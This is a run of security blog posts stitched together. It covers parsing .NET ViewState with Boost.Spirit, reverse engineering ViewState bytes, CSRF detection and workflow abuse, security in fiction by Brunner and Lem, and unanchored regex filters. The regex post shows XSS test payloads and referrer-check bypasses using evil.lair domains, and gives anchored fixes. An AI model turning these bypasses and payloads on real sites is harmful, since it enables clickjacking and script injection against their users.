The action associated with the length rule is in square brackets. (Not to be confused with the square brackets that are part of the repeat syntax.) Remember that length exposes a numeric attribute, specifically an unsigned integer. The attribute of a rule can be captured with the _1 placeholder. The local variable for this grammar is captured with _a. Local variables can be passed into, manipulated, and accessed by other rules in the grammar. In the previous example, the value of length is set to _a via simple assignment in the action. Next, the repeat parser takes the value of _a to build the “string” stored in the ViewState. The omit parser keeps the extraneous bytes out of the string.

Now we can put the String parser into the original grammar by adding two lines of code. That this step is so trivial speaks volumes about the extensibility of Spirit:

    object = empty | my_string | pair;
    start = version // must start with recognized version
        >> +object; // contains one or more objects

String<Iterator> my_string;
qi::rule<Iterator> empty, ...

The String grammar introduced the repeat parser. We’ll use that parser again in the grammar for interpreting ViewState containers. At this point the growth of the grammar accelerates quickly because we have good building blocks in place:

    using boost::spirit::qi::byte_;
    using boost::spirit::qi::repeat;

    container = byte_(0x16)
        >> length [ _a = _1 ]
        >> repeat(_a)[object] ;

    empty = byte_(0x64);

    object = empty | my_string | pair | container;

String<Iterator> my_string;
UInteger32<Iterator> length;
qi::rule<Iterator, qi::locals<unsigned> > container;
qi::rule<Iterator> empty, ...

This has been a whirlwind introduction to Spirit. If you got lost along the way, don’t worry. Try going through the examples in Spirit’s documentation. Then, re-read this article to see if the concepts make more sense. I’ll also make the sample code available to help get you started.

There will be a few surprises as you experiment with building Spirit grammars. For one, you’ll notice that compilation takes an unexpectedly long time for just a dozen or so lines of code. This is due to Spirit’s template-heavy techniques. While the duration contrasts with “normal” compile times for small programs, I find it a welcome trade-off considering the flexibility Spirit provides.

Another surprise will be error messages. Misplace a semi-colon or confuse an attribute and you’ll be greeted with lines and lines of error messages. Usually, the last message provides a hint of the problem. Experience is the best teacher here. I could go on about hints for reading error messages, but that would be an article on its own.

Between compile times and error messages, debugging rules might seem a daunting task. However, the creators of Spirit have your interests in mind. They’ve created two very useful aids to debugging: naming rules and the debug parser. The following example shows how these are applied to the String grammar. Once again, the change is easy to implement:

    start = omit[ (byte_(0x05) | byte_(0x1e))
        >> length[ _a = _1 ] ]
        >> repeat(_a)[byte_] ;

    start.name("string"); // Human readable name for the rule
    debug(start);         // Produce XML output of the parser's activity
}

UInteger32<Iterator> length;
qi::rule<Iterator, qi::locals<unsigned> > start;

As a final resource, Boost.Spirit has its own web site with more examples, suggestions, and news on the development of this fantastic library.

It seems unfair to provide all of these code snippets without a complete code listing for reference or download. Plus, I suspect formatting restrictions may make it more difficult to read. Watch for updates to this article that provide both full code samples and more readable layout. Hopefully, there was enough information to get you started on creating your own parsers for ViewState or other objects.

In the next article in this series we’ll shift from parsing ViewState to attacking it and using it to carry our attacks past input validation filters into the belly of the web app.

  1. Spirit has pre-built parsers for many data types, including different types of integers. We need to use custom ones to deal with ViewState’s numeric serialization. 

A Spirited Peek into ViewState, Part I

The security pitfalls of the .NET ViewState object have been well-known since its introduction in 2002. The worst mistake is for a developer to treat the object as a black box that will be controlled by the web server and opaque to the end user. Before diving into ViewState security problems we need to explore its internals. This article digs into more technical language1 than others on this site and focuses on reverse engineering the ViewState. Subsequent articles will cover security. To invoke Bette Davis: “Fasten your seat belts. It’s going to be a bumpy night.”2

The ViewState enables developers to capture transient values of a page, form, or server variables within a hidden form field. The ability to track the “state of the view” (think model-view-controller) within a web page alleviates burdensome server-side state management for situations like re-populating fields during multi-step form submissions, or catching simple form entry errors before the server must get involved in their processing. (MSDN has several articles that explain this in more detail.)

This serialization of a page’s state involves objects like numbers, strings, arrays, and controls. These “objects” are not just conceptual. The serialization process encodes .NET objects (in the programming sense) into a sequence of bytes in order to take it out of the server’s memory, transfer it inside the web page, and reconstitute it when the browser submits the form.

Our venture into the belly of the ViewState starts with a blackbox perspective that doesn’t rely on any prior knowledge of the serialization process or content. The exploration doesn’t have to begin this way. You could write .NET introspection code or dive into ViewState-related areas of the Mono project for hints on unwrapping this object. I merely chose this approach as an intellectual challenge because the technique can be generalized to analyzing any unknown binary content.

The first step is trivial and obvious: decode from Base64. As we’re about to see, the ViewState contains byte values forbidden from touching the network via an HTTP request. The data must be encoded with Base64 to ensure survival during the round trip from server to browser. If a command-line pydoc base64 or perldoc MIME::Base64 doesn’t help you get started, a simple web search will turn up several ways to decode from Base64. Here’s the beginning of an encoded ViewState (this sample is re-encoded from the decoded bytes we’re about to examine):

/wEPDwUJNzIwNzAyODk0...

Now we’ll break out the xxd command to examine the decoded ViewState. One of the easiest steps in reverse engineering is to look for strings because our brains evolved to pick out important words like “donut”, “Password”, and “zombies!” quickly. The following line shows the first 16 bytes that xxd produces from the previous example. To the right of the bytes xxd has written matching ASCII characters for printable values – in this case the string 720702894.

0000000: ff01 0f0f 0509 3732 3037 3032 3839 340f ......720702894.
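The decode step is easy to reproduce. As a quick sketch, the sample Base64 value below is reconstructed by re-encoding the sixteen decoded bytes shown above; it is not the original page’s full ViewState:

```python
import base64
import binascii

# Reconstructed sample: the first 16 decoded bytes from the hex dump,
# re-encoded. A real ViewState continues well past this point.
encoded = "/wEPDwUJNzIwNzAyODk0Dw=="

raw = base64.b64decode(encoded)
print(binascii.hexlify(raw).decode())  # ff010f0f05093732303730323839340f
print(raw[6:15].decode("ascii"))       # 720702894
```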

Strings have a little more complexity than this example conveys. In an English-centric world words are nicely grouped into arrays of ASCII characters. This means that a programming language like C treats strings as a sequence of bytes followed by a NULL. In this way a program can figure out that the bytes 0x627261696e7300 represent a six-letter word by starting at the string’s declared beginning and stopping at the first NULL (0x00). I’m going to do some hand-waving about the nuances of characters, code points, character encodings and their effect on “strings” as I’ve just described. For the purpose of investigating ViewState we only need to know that strings are not (or are very rarely) NULL-terminated.

Take another look at the decoded example sequence. I’ve highlighted the bytes that correspond to our target string. As you can see, the byte following 720702894 is 0x0f – not a NULL. Plus, 0x0f appears twice before the string starts, which implies it has some other meaning:

ff01 0f0f 0509 **3732 3037 3032 3839 34**0f ......720702894.

The lack of a common terminator indicates that the ViewState serializer employs some other hint to distinguish a string from a number or other type of data. The most common device in data structures or protocols like this is a length delimiter. If we examine the byte before our visually detected string, we’ll see a value that coincidentally matches its length. Count the characters in 720702894.

ff01 0f0f 05**09** 3732 3037 3032 3839 340f ......720702894.

Congratulations to anyone who immediately wondered if ViewState strings are limited to 255 characters (the maximum value of a byte). ViewState numbers are a trickier beast to handle. It’s important to figure these out now because we’ll need to apply them to other containers like arrays.3 Here’s an example of numbers and their corresponding ViewState serialization. We need to examine them on the bit level to deduce the encoding scheme.

Decimal   Hex     Binary  
1         01      00000001  
9         09      00001001  
128       8001    10000000 00000001  
655321    d9ff27  11011001 11111111 00100111

The important hint is the transition from values below 128 to those above. Seven bits of each byte are used for the number. The high bit tells the parser, “Include the next byte as part of this numeric value.”

For example, the two bytes 0x86 0x2b serialize a single number, least significant byte first:

LSB           MSB  
10000110 00101011

Here’s the same number with the unused “high” bit removed and reordered with the most significant bits first.

MSB   ...   LSB  
0101011 0000110 (5510, 0x1586)
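A decoder for this scheme fits in a few lines. The following sketch (the function name is mine, not part of any ViewState API) walks the bytes least significant first, masking off the high “continue” bit:

```python
def decode_viewstate_number(data, pos=0):
    """Decode the 7-bit, least-significant-byte-first number encoding."""
    value, shift = 0, 0
    while True:
        byte = data[pos]
        pos += 1
        value |= (byte & 0x7F) << shift   # keep the low seven bits
        if not byte & 0x80:               # high bit clear: last byte
            return value, pos
        shift += 7

# The worked examples from the table and text above:
print(decode_viewstate_number(b"\x09"))         # (9, 1)
print(decode_viewstate_number(b"\x80\x01"))     # (128, 2)
print(decode_viewstate_number(b"\x86\x2b"))     # (5510, 2)
print(decode_viewstate_number(b"\xd9\xff\x27")) # (655321, 3)
```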

Now that we’ve figured out how to pick out strings and their length it’s time to start looking for ways to identify different objects. Since we have strings on the mind, let’s walk back along the ViewState to the byte before the length field. We see 0x05.

ff01 0f0f **05**09 3732 3037 3032 3839 340f ......720702894.

That’s the first clue that 0x05 identifies a string. We confirm this by examining other suspected strings and walking the ViewState until we find a length byte (or bytes) preceded by the expected identifier. There’s a resounding correlation until we find a series of strings back-to-back that lack the 0x05 identifier. Suddenly, we’re faced with an unknown container. Oh dear. Look for the length field for the three strings:

0000000: 1503 0774 6f70 5f6e 6176 3f68 7474 703a ...top_nav?http:
0000010: 2f2f 7777 772e 5f5f 5f5f 5f5f 5f2e 636f //www._______.co
0000020: 6d2f 4162 6f75 7455 732f 436f 6e74 6163 m/AboutUs/Contac
0000030: 7455 732f 7461 6269 642f 3634 392f 4465 tUs/tabid/649/De
0000040: 6661 756c 742e 6173 7078 0a43 6f6e 7461 fault.aspx.Conta
0000050: 6374 2055 73 ct Us

Moving to the first string in this list we see that the preceding byte, 0x03, is a number that luckily matches the number of strings in our new, unknown object. We peek at the byte before the number and see 0x15. We’ll call this the identifier for a String Array.

At this point the reverse engineering process is easier if we switch from a completely black box approach to one that references MSDN documentation and output from other tools.

Two of the most common objects inside a ViewState are Pairs and Triplets. As the name implies, these containers (also called tuples) have two or three members. There’s a catch here, though: They may have empty members. Recall the analysis of numbers. We wondered how upper boundaries (values greater than 255) might be handled, but we didn’t consider the lower bound. How might empty containers be handled? Do they have a length of zero (0x00)? Without diverging too far off course, I’ll provide the hint that NULL strings are 0x65 and the number zero (0) is 0x66.

The root object of a ViewState is either a Pair or Triplet. Thus, it’s easy to inspect different samples in order to figure out that 0x0f identifies a Pair and 0x10 a Triplet. Now we can descend the members to look for other kinds of objects.

A Pair has two members. This also implies that it doesn’t need a size identifier since there’s no point in encoding “2” for a container that is designed to hold two members. (Likewise “3” for Triplets.) Now examine the ViewState using a recursive descent parser. This basically means that we encounter a byte, update the parsing context based on what the byte signifies, then consume the next byte based on the current context. In practice, a byte sequence like the following demonstrates nested Pairs:

0000000: ff01 0f0f 0509 3732 3037 3032 3839 340f ......720702894.
0000010: 6416 0666 0f16 021e 0454 6578 7405 793c d..f.....Text.y<
 - Member 1: Pair
    - Member 1: String
    - Member 2: Pair
       - Member 1: ArrayList (0x16) of 6 elements
           Number 0
       - Member 2: Empty
 - Member 2: Empty
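A recursive descent parser for the handful of identifiers deduced so far fits in a page of code. This is a sketch based solely on the observations above (0x0f Pair, 0x05 string, 0x15 string array, 0x65 NULL string, 0x66 zero); a real ViewState uses many more identifiers, so here it runs against a synthetic byte sequence:

```python
def read_number(buf, pos):
    # The 7-bit, least-significant-byte-first encoding deduced earlier
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7

def parse(buf, pos):
    """Recursively parse a few of the identifiers deduced in this article."""
    t = buf[pos]
    pos += 1
    if t == 0x0F:                     # Pair: exactly two members, no size field
        first, pos = parse(buf, pos)
        second, pos = parse(buf, pos)
        return ("Pair", first, second), pos
    if t == 0x05:                     # length-prefixed string
        n, pos = read_number(buf, pos)
        return buf[pos:pos + n].decode("ascii"), pos + n
    if t == 0x15:                     # string array: count, then bare strings
        count, pos = read_number(buf, pos)
        items = []
        for _ in range(count):
            n, pos = read_number(buf, pos)
            items.append(buf[pos:pos + n].decode("ascii"))
            pos += n
        return items, pos
    if t == 0x66:                     # the number zero
        return 0, pos
    if t == 0x65:                     # NULL/empty string
        return "", pos
    raise ValueError("unknown identifier 0x%02x at offset %d" % (t, pos - 1))

# A synthetic Pair(string, string array) assembled from bytes we've seen:
sample = b"\x0f\x05\x09" + b"720702894" + b"\x15\x02\x07top_nav\x0aContact Us"
tree, _ = parse(sample, 0)
print(tree)  # ('Pair', '720702894', ['top_nav', 'Contact Us'])
```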

Don’t worry if you finish parsing with 16 or 20 leftover bytes. These correspond to the MD5 or SHA1 hash of the contents. In short, this hash prevents tampering with ViewState data. Recall that the ViewState travels back and forth between the client and server. There are many reasons why the server wants to ensure the integrity of the ViewState data. We’ll explore integrity (hashing), confidentiality (encryption), and other security issues in a future article.

I haven’t hit every possible control object that might sneak into a ViewState. You can find a NULL-terminated string. You can find RGBA color definitions. And a lot more.

This was a brief introduction to the ViewState. It’s necessary to understand its basic structure and content before we dive into its security implications. In the next part of this series I’ll expand the analysis to more objects while showing how to use the powerful parsing available from the Boost.Spirit C++ library. We could even dive into JavaScript parsing for those who don’t want to leave the confines of the browser. After that, we’ll look at the security problems due to unexpected ViewState manipulation and the countermeasures for web apps to deploy. In the meantime, I’ll answer questions that pop up in the comments.

  1. More technical, but not rigorously so. Given the desire for brevity, some programming terms like objects, controls, NULL, strings, and numbers (integers signed or unsigned) are thrown about rather casually. 

  2. All About Eve. (Then treat yourself to The Little Foxes and What Ever Happened to Baby Jane?) 

  3. I say “other containers” because strings can simply be considered a container of bytes, albeit bytes with a particular meaning and restrictions. 

CSRF and Beyond

Identifying CSRF vulnerabilities is more interesting than just scraping HTML for hidden fields or forging requests. CSRF stems from a design issue of HTTP and HTML that is in one aspect a positive feature of the web, but leads to unexpected consequences for web sites. We’ll start with a brief description of detection methods before diverging onto interesting(?!) tangents.

A passive detection method that is simple to automate looks for the presence or absence of CSRF tokens in web pages. This HTML scraping is prone to many errors and generates noisy results that don’t scale well for someone dealing with more than one web site at a time. This approach just assumes the identity of a token; it doesn’t verify that it is a valid one or more importantly that the application verifies it. Unless the page is examined after JavaScript has updated the DOM, this technique misses dynamically generated tokens, form fields, or forms.

An active detection method that can be automated replays requests under different user sessions. This approach follows the assumption that CSRF tokens are unique to a user’s session, such as the session cookie1 or other pseudo-random value. There’s also a secondary assumption that concurrent sessions are possible. To be effective, this approach requires a browser or good browser emulation to deal with any JavaScript and DOM updates. Basically, this technique swaps forms between two user sessions. If the submission succeeds, then it’s more likely request forgery is possible. If the submission fails, then it’s more likely a CSRF countermeasure has blocked it. There’s still potential for false negatives if some static state token or other form field wasn’t updated properly. The benefit of this approach is that it’s not necessary to guess the identity of a token and that the test is actually determining whether a request can be forged.

Once countermeasures based on the Origin header become widespread, the replay approach might be as simple as setting an off-origin value for this header. A server will either reject or accept the request. This would be a nice, reliable detection (not to mention a simple, strong countermeasure), but sadly not an imminent one.2

Almost by default, an HTML form is vulnerable to CSRF. (For the sake of word count, forms will be synonymous with any “resource” like a link or XHR request.) WhiteHat Security described one way to narrow the scope of CSRF reporting from any form whatsoever to resources that fall into a particular category. Read the original post3, then come back. I’ve slightly modified WhiteHat’s three criteria to be resources:

  • with a security context or that cross a security boundary, such as password or profile management
  • that deliver an HTML injection (XSS) or HTTP response splitting payload to a vulnerable page on the target site. This answers the question for people who react to those vulns with, “That’s nice, but so what if you can only hack your own browser.” This seems more geared towards increasing the risk of a pre-existing vuln rather than qualifying it as a CSRF. We’ll come back to this one.
  • where sensitive actions are executed, such as anything involving money, updating a friend list, or sending a message

The interesting discussion starts with WhiteHat’s “benign” example. To summarize, imagine a site with a so-called non-obvious CSRF, one XSS vuln, one Local File Inclusion (LFI) vuln, and a CSRF-protected file upload form. The attack uses the non-obvious CSRF to exploit the XSS vuln, which in turn triggers the file upload to exploit the LFI. For example, the attacker creates the JavaScript necessary to upload a file and exploit the LFI, places this payload in an image tag on an unrelated domain, and waits for a victim to visit the booby-trapped page so their browser loads <img src=””>.

This attack was highlighted as a scenario where CSRF detection methods would usually produce false negatives because the vulnerable link doesn’t otherwise affect the user’s security context or perform a sensitive action.

Let’s review the three vulns:

  • Ability to forge a request to a resource, considered “non-obvious” because the resource doesn’t affect a security context or execute a sensitive action.
  • Presence of HTML injection, HTTP Response Splitting, or other clever code injection vulnerability in said resource.
  • Presence of Local File Inclusion.

Using XSS to upload a file isn’t a vulnerability. There’s nothing that says JavaScript within the Same Origin Rule (under which the XSS falls once it’s reflected) can’t use XHR to POST data to a file upload form. It also doesn’t matter if the file upload form has CSRF tokens because the code is executing under the Same Origin Rule and therefore has access to the tokens.

I think these two recommendations would be made by all and accepted by the site developers as necessary:

  • Fix the XSS vulnerability using recommended practices (let’s just assume the arg variable is simply reflected in the page)
  • Fix the Local File Inclusion (by verifying file content, forcing MIME types, not making the file readable, not using PHP at all, etc.)

But it was CSRF that started us off on this attack scenario. This leads to the question of how the “non-obvious” CSRF should be reported, especially from an automation perspective:

  • Is a non-obvious CSRF vulnerability actually obvious if the resource has another vuln (e.g. XSS)? Does the CSRF become non-reportable once the other vuln has been fixed?
  • Should a non-obvious CSRF vulnerability be obvious anyway if it has a query string (or form fields, etc.) that might be vulnerable?

If you already believe CSRF should be addressed on every page, then clearly you would have already marked the example vulnerable just by inspection because it didn’t have an explicit countermeasure. But what about those who don’t follow the absolutist prescription of CSRF countermeasures everywhere? (Perhaps for performance reasons, or because the resource doesn’t affect the user’s state or security context.)

Think about pages that use “referrer” arguments. For example:

In addition to possibly being an open redirect, these are prime targets for XSS with payloads like

It seems that in these cases the presence of CSRF just serves to increase the XSS risk rather than be a vuln on its own. Otherwise, you risk producing too much noise by calling any resource with a query string vulnerable. In this case CSRF provides a rejoinder to the comment, “That’s a nice reflected XSS, but you can only hack yourself with it. So what.” Without the XSS vuln you probably wouldn’t waste time protecting that particular resource.

Look at a few of the other WhiteHat examples. They clearly fall into CSRF (changing shipping address, password set/reset mechanisms) with no doubt that successful exploits could be demonstrated.

What’s interesting is that they seem to require race conditions or to happen during specific workflows to be successful4, e.g. execute the CSRF so the shipping address is changed before the transaction is completed. That neither detracts from the impact nor obviates it as a vulnerability. Instead, it highlights a more subtle aspect of web security: state management.

Let’s set aside malicious attackers and consider a beneficent CSRF donor. Our scenario begins with an ecommerce site. The victim, a lucky recipient in this case, has selected an item and placed it into a virtual shopping cart.

1) The victim (lucky recipient!) fills out a shipping destination.

2) The attacker (benefactor!) uses a CSRF attack to apply a discount coupon.

3) The recipient supplies a credit card number.

4) Maybe the web site is really bad and the benefactor knows that the same coupon can be applied twice. A second CSRF applies another discount.

5) The recipient completes the transaction.

6) Our unknown benefactor looks for the new victim of this CSRF attack.

I chose this Robin Hood-esque scenario to take your attention away from the malicious attacker/victim formula of CSRF to focus on the abuse of workflows.

A CSRF countermeasure would have prevented the discount coupon from being applied to the transaction, but that wouldn’t fully address the underlying issues here. Consider the state management for this transaction.

One problem is that the coupon can be applied multiple times. During a normal workflow the site’s UI leads the user through a check-out sequence that must be followed. On the other hand, if the site only prevented users from revisiting the coupon step in the UI, then the site’s developers have forgotten how trivial it is to replay GET and POST requests. This is an example of a state management issue where an action that should be performed only once can be executed multiple times.

A less obvious problem of state management is the order in which the actions were performed. The user submitted a discount coupon in two different steps: right after the shipping destination and right after providing payment info. In the UI, let’s assume the option to apply a discount shows up only after the user provides payment information. A strict adherence to this transaction’s state management should have rejected the first discount coupon since it arrived out of order.

Sadly, we have to interrupt this thought to address real-world challenges of web apps. I’ve defined a strict workflow as (1) shipping address required, (2) payment info required, (3) discount coupon optional, (4) confirm transaction required. A site’s UI design influences how strict these steps will be enforced. For example, the checkout process might be a single page that updates with XHR calls as the user fills out each section in any order. Conversely, this single page checkout might enable each step as the user completes them in order.

UI enforcement cannot guarantee that requests be made in order. This is where decisions have to be made regarding how strictly the sequence is to be enforced. It’s relatively easy to have a server-side state object track these steps and only update itself for requests in the correct order. The challenge is keeping the state flexible enough to deal with users who abandon a shopping cart, decide at the last minute to add an extra widget before confirming the transaction, or take a multitude of other actions that affect the state. These aren’t insurmountable challenges, but they induce complexity and require careful testing. The trade-off between coarse state management and granular control is more a question of software correctness than of security. You can still have a secure site if steps can be performed in the order 3, 1, 2, 4 rather than the expected 1, 2, 3, 4.
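One way to implement the stricter side of that balance is a small server-side table of step prerequisites. The sketch below is hypothetical (step names and rules are invented for illustration); it rejects both out-of-order steps and replayed coupon submissions:

```python
# Hypothetical checkout workflow: each step names the steps that must
# already be complete before it may run.
CHECKOUT_STEPS = {
    "shipping": set(),                     # step 1: no prerequisites
    "payment":  {"shipping"},              # step 2
    "coupon":   {"payment"},               # step 3 (optional, after payment)
    "confirm":  {"shipping", "payment"},   # step 4
}

class Checkout:
    def __init__(self):
        self.completed = set()

    def submit(self, step):
        missing = CHECKOUT_STEPS[step] - self.completed
        if missing:
            return "rejected: complete %s first" % ", ".join(sorted(missing))
        if step == "coupon" and "coupon" in self.completed:
            return "rejected: coupon already applied"   # no replaying step 3
        self.completed.add(step)
        return "ok"

order = Checkout()
print(order.submit("coupon"))    # rejected: complete payment first
print(order.submit("shipping"))  # ok
print(order.submit("payment"))   # ok
print(order.submit("coupon"))    # ok
print(order.submit("coupon"))    # rejected: coupon already applied
```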

CSRF is about requests made in the victim’s session context (by the victim’s browser) on behalf of the attacker (initiated from an unrelated domain) without the victim’s interaction. If a link, iframe, image tag, JavaScript, etc. causes the victim’s browser to make a request that affects that user’s state in another web site, then the CSRF attack succeeded. The conceptual way to fix CSRF is to identify forged requests and reject them. CSRF tokens are intended to identify legitimate requests because they’re a shared secret between the site and the user’s browser. An attacker who doesn’t know the secret can’t forge a legitimate request.

What this discussion of CSRF attacks has highlighted is the soft underbelly of web sites’ state management mechanisms.

Automated scanners should excel at scalability and consistent accuracy, but woe to those who believe they fully replace manual testing. Scanners find implementation errors (forgetting to use a prepared statement for a SQL query, not filtering angle brackets, etc.), but they don’t have the capacity to understand fundamental design flaws. Nor should they be expected to. Complex interactions are best understood and analyzed by manual testing. CSRF stands astride the gap between automation and manual testing. Automation identifies whether a site accepts forged requests, whereas manual testing can delve deeper into underlying state vulnerabilities or chains of exploits that CSRF might enable.

  1. Counter to recommendations that session cookies have the Http-Only attribute so their value is not accessible via JavaScript. Http-Only is intended to mitigate some XSS exploits. However, the presence of XSS basically negates any CSRF countermeasure since the XSS payload can perform requests in the Same Origin without having to resort to forged, off-origin requests. 

  2. A chicken-and-egg problem since there needs to be enough adoption of browsers that include the Origin header for such a countermeasure to be useful without rejecting legitimate users. Although such rejection would be excellent motivation for users to update old, likely insecure, and definitely less secure browsers. 


  4. These particular attacks are significantly easier on unencrypted Wi-Fi networks with sites that don’t use HTTPS, but in that case there are a lot of different attacks. Plus, the basis of CSRF tokens is that they are confidential to the user’s browser – not the case when sniffing HTTP. 

Electric Skillet

Of John Brunner’s novels, I recommend reading Stand on Zanzibar first; it’s a well-known classic. Follow that with The Sheep Look Up. If you’re interested in novelty, The Squares of the City has the peculiar attribute of being written to the rules of a chess game (the book’s appendix maps each character’s role to its relevant piece).

Two of Brunner’s books contain computer security concepts and activities. The first one, The Shockwave Rider, was written in 1975 and is largely responsible for generating the concept of a worm. A character, Sandy, explains:

What you need is a worm with a completely different structure. The type they call a replicating phage.

The character continues with a short history of replicating phages, including one developed at a facility called Electric Skillet:

…and its function is to shut the net down and prevent it being exploited by a conquering army. They think the job would be complete in thirty seconds.

The main character, Nick Halflinger, creates a variant of the self-replicating phage. Instead of devouring its way toward the destruction of the net, the program grows off data as a virtual parthenogenetic tapeworm. Nick is a smart computer sabotage consultant (among other things); his creation “won’t expand to indefinite size and clog the net for other use. It has built-in limits.” No spoilers, but the tapeworm has a very specific purpose.

In his 1988 novel Children of the Thunder, Brunner mentions a logic bomb as he introduces a freelance writer who had been covering a computer security conference. Brunner didn’t coin this term, though. Malicious insiders were creating logic bombs at least since 19851, famously described by a computer scientist in 1984, and known in the late 70s 2 (including a U.S. law covering cybercrime in 1979).

The history of the term is almost beside the point because the whimsical nature of the fictional version deserves note 3:

Two months ago a logic bomb had burst in a computer at British Gas, planted, no doubt, by an employee disgruntled about the performance of his or her shares, which resulted in each of its customers in the London area being sent the bill intended for the next person on the list – whereupon all record of the sums due had been erased.

A paragraph later we’re treated to a sly commentary embedded in the description of the newspaper who hired the journalist:

The paper…was in effect a news digest, aimed at people with intellectual pretensions but whose attention span was conditioned by the brevity of radio and TV bulletins, and what the [editor] wanted was a string of sensational snippets about his readers’ privacy being infringed, bent programmers blackmailing famous corporations, saboteurs worming their way into GCHQ and the Ministry of Defense…”

The fictional newspaper is called the Comet, but it sounds like an ancestor to El Reg (with the addition of pervasive typos and suggestive puns). It’s amusing to see commentary on the attenuation of attention spans due to radio and TV in 1988. It provides a multi-decade precursor to contemporary screeds against Twitter, texting, and Facebook.

Should you have attention left to continue reading, I encourage you to try one or more of these books.

  1. “Man Guilty in ‘Logic Bomb’ Case.” Los Angeles Times 4 July 1985, Southland ed., Metro; 2; Metro Desk sec.: 3. “[Dennis Lee Williams], who could face up to three years in prison when sentenced by Los Angeles Superior Court Judge Kathleen Parker on July 31, was convicted of setting up the program designed to shut down important data files.” 

  2.  Communications of the ACM: Volume 22. 1979. “…logic bomb (programmed functions triggered to execute upon occurrence of future events)…” 

  3.  Brunner, John. Children of the Thunder. New York: Ballantine, 1989. 8-9. 

Carborundum Saw

It’s entertaining to come across references to computer security in fiction. Sometimes the reference may be grating, infused with hyperbole or laughably flawed. Sometimes it may seem surprisingly prescient, falling somewhere along a spectrum of precision and detail.

Even more rewarding is to encounter such a quote within a good book. Few readers who venture outside of modern bestsellers, science-fiction or otherwise, may recognize the author Stanisław Lem, but they may be familiar with the movie based on his book of the same name: Solaris. Lem has written several books, two of my favorites being The Cyberiad and Fiasco.

One Human Minute, from 1986, isn’t about computers in particular. The story is presented as a book review of an imagined tome that describes one minute of the entire Earth’s population. It also has this fun gem:

Meanwhile, computer crime has moved from fantasy into reality. A bank can indeed be robbed by remote control, with electronic impulses that break or fool security codes, much as a safecracker uses a skeleton key, crowbar, or carborundum saw. Presumably, banks suffer serious losses in this way, but here One Human Minute is silent, because – again, presumably – the world of High Finance does not want to make such losses public, fearing to expose this new Achille’s heel: the electronic sabotage of automated bookkeeping.1

Carborundum saw would also make a great name for a hacking tool.

  1. Lem, Stanisław. One Human Minute. Trans. Catherine S. Leach. San Diego: Harvest Book, 1986. 34. 

Regex-based security filters sink without anchors


In June 2010 the Stanford Web Security Research Group released a study of clickjacking countermeasures employed across Alexa Top-500 web sites. It’s an excellent survey of different approaches taken by web developers to prevent their sites from being subsumed by an iframe tag.

One interesting point emphasized in the paper is how easily regular expressions can be misused or misunderstood as security filters. Regexes can be used to create positive or negative security models – either match acceptable content (allow listing) or match attack patterns (deny listing). Inadequate regexes lead to more vulnerabilities than just clickjacking.

One of the biggest mistakes made in regex patterns is leaving them unanchored. Anchors determine the span of a pattern’s match against an input string. The ^ anchor matches the beginning of a line. The $ anchor matches the end of a line. (Just to confuse the situation, when ^ appears inside grouping brackets it indicates negation, e.g. [^a]+ means match one or more characters that is not a.)

Consider the example of the’s document.referrer check as shown in Section 3.5 of the Stanford paper. The weak regex is highlighted below:

if(window.self != &&
   !document.referrer.match(/https?:\/\/[^?\/]+\.nytimes\.com\//)) {

As the study’s authors point out (and anyone who is using regexes as part of a security or input validation filter should know), the pattern is unanchored and therefore easily bypassed. The site developers intended to check the referrer for links like these:

Since the pattern isn’t anchored, it will look through the entire input string for a match, which leaves the attacker with a simple bypass technique. In the following example the pattern matches the bracketed portion of the referrer – clearly not the developers’ intent:

https://evil.lair/clickjack.html?fake=[]

The devs wanted to match a URI whose domain included “”, but the pattern would match anywhere within the referrer string.

The regex would be improved by requiring the pattern to begin at the first character of the input string. The new, anchored pattern would look more like this:

/^https?:\/\/[^?\/]+\.nytimes\.com\//

The same concept applies to input validation for form fields and URI parameters. Imagine a web developer, we’ll call him Wilberforce for alliterative purposes, who wishes to validate U.S. zip codes submitted in credit card forms. The simplest pattern would check for five digits, using any of these approaches:

[0-9]{5}
\d{5}
[[:digit:]]{5}

At first glance the pattern works. Wilberforce even tests some basic XSS and SQL injection attacks with nefarious payloads like and 'OR 19=19. The regex rejects them all.

Then our attacker, let’s call her Agatha, happens to come by the site. She’s a little savvier and, whether or not she knows exactly what the validation pattern looks like, tries a few malicious zip codes (the five digits are underlined):

90210'
<script>alert(0x42)</script>57732
10118<script>alert(0x42)</script>

Poor Wilberforce’s unanchored pattern finds a matching string in all three cases, thereby allowing the malicious content through the filter and enabling Agatha to compromise the site. If the pattern had been anchored to match the complete input string from beginning to end, the filter wouldn’t have failed so spectacularly:

^\d{5}$

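Wilberforce’s unanchored pattern versus the anchored fix, sketched in JavaScript (the payload is modeled on Agatha’s):

```javascript
const loose  = /\d{5}/;    // finds five digits anywhere in the input
const strict = /^\d{5}$/;  // the entire input must be exactly five digits

const payload = '10118<script>alert(0x42)</script>';

console.log(loose.test(payload));  // true  – filter bypassed
console.log(strict.test(payload)); // false – payload rejected
console.log(strict.test('90210')); // true  – valid zip still accepted
```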
Unravelling Strings

Even basic string-matching approaches can fall victim to the unanchored problem; after all, they’re nothing more than regex patterns without the syntax for wildcards, alternation, and grouping. Let’s go back to the Stanford paper for an example of walmart.com’s document.referrer check based on the JavaScript String object’s indexOf function. This function returns the first position in the input string of the argument, or -1 in case the argument isn’t found:

if(top.location != location) {
  if(document.referrer && document.referrer.indexOf("walmart.com") == -1) {

Sigh. As long as the document.referrer contains the string “walmart.com” the anti-framing code won’t trigger. For Agatha, the bypass is as simple as putting her booby-trapped clickjacking page on a site with a domain name like “walmart.com.evil.lair” or maybe using a URI fragment, https://evil.lair/#walmart.com. The developers neglected to ensure that the host from the referrer URI ends in walmart.com rather than merely contains it.

The previous sentence is very important. The referrer string isn’t supposed to end in walmart.com; the referrer’s host is supposed to end with that domain. That’s an important distinction considering the bypass techniques we’ve already mentioned.
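A hedged sketch of that distinction: parse the referrer first, then compare the host’s ending (good.site and evil.lair are hypothetical names; the URL class is available in modern browsers and Node):

```javascript
// Return true only when the referrer's *host* is the domain or a subdomain of it.
function referrerHostOk(referrer, domain) {
  let host;
  try {
    host = new URL(referrer).hostname;
  } catch (e) {
    return false; // an unparseable referrer fails closed
  }
  return host === domain || host.endsWith('.' + domain);
}

console.log(referrerHostOk('https://www.good.site/page', 'good.site'));   // true
console.log(referrerHostOk('https://good.site.evil.lair/', 'good.site')); // false
console.log(referrerHostOk('https://evil.lair/good.site', 'good.site'));  // false
```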

Parsers Before Patterns

